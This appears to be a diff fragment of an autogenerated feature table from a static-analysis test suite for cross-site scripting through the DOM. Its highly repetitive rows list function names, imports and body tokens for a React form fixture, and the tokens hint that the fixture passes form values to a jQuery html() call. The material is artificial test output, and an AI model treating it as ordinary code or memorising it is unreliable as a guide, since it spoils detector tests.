... \\n )} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:5:52:6 | render= ... \\n )} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | 'arguments' object of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | 'arguments' object of anonymous function | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | 'arguments' object of anonymous function | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | 'arguments' object of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | ({ hand ... >\\n ) | assignedToPropName | render | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | ({ hand ... >\\n ) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | ({ hand ... >\\n ) | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | ({ hand ... >\\n ) | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | ({ hand ... >\\n ) | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | ({ hand ... >\\n ) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | exceptional return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | exceptional return of anonymous function | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | exceptional return of anonymous function | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | exceptional return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | return of anonymous function | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | return of anonymous function | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | return of anonymous function | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:13:52:5 | return of anonymous function | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | handleSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | handleSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | { handl ... alues } | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | { handl ... alues } | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | { handl ... alues } | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | { handl ... alues } | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:14:48:65 | { handl ... alues } | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:16:48:27 | handleSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:30:48:33 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:36:48:45 | submitting | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:48:48:55 | pristine | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:58:48:63 | values | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:48:71:52:5 | (\\n ... >\\n ) | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:48:71:52:5 | (\\n ... >\\n ) | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:48:71:52:5 | (\\n ... >\\n ) | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:48:71:52:5 | (\\n ... >\\n ) | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:48:71:52:5 | (\\n ... >\\n ) | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:7:51:13 | | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:7:51:13 | | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:49:7:51:13 | | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:7:51:13 | | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:7:51:13 | | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:8:49:11 | form | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:8:49:11 | form | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:49:8:49:11 | form | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:8:49:11 | form | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:8:49:11 | form | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:20 | onSubmit | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:20 | onSubmit | contextSurroundingFunctionParameters | ()\n(?) | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:20 | onSubmit | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:20 | onSubmit | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:20 | onSubmit | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | contextFunctionInterfaces | App()\nFormikBasic()\nHookForm()\nHookForm2()\nhandleSubmit(values, ?)\nmapPropsToValues()\nonSubmit(data)\nonsubmit(e)\nplainReact()\nplainSubmit(e)\nvalidate(values)\nvanillaJS() | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | enclosingFunctionBody | Form onSubmit values $ #id html values stooge initialValues stooge larry employed false render handleSubmit form submitting pristine values form onSubmit handleSubmit \n input type text name stooge \n | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | enclosingFunctionName | App | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:13:49:35 | onSubmi ... Submit} | fileImports | formik react react-final-form react-hook-form | +| autogenerated/Xss/XssThroughDom/forms.js:49:23:49:34 | handleSubmit | assignedToPropName | onSubmit | +| 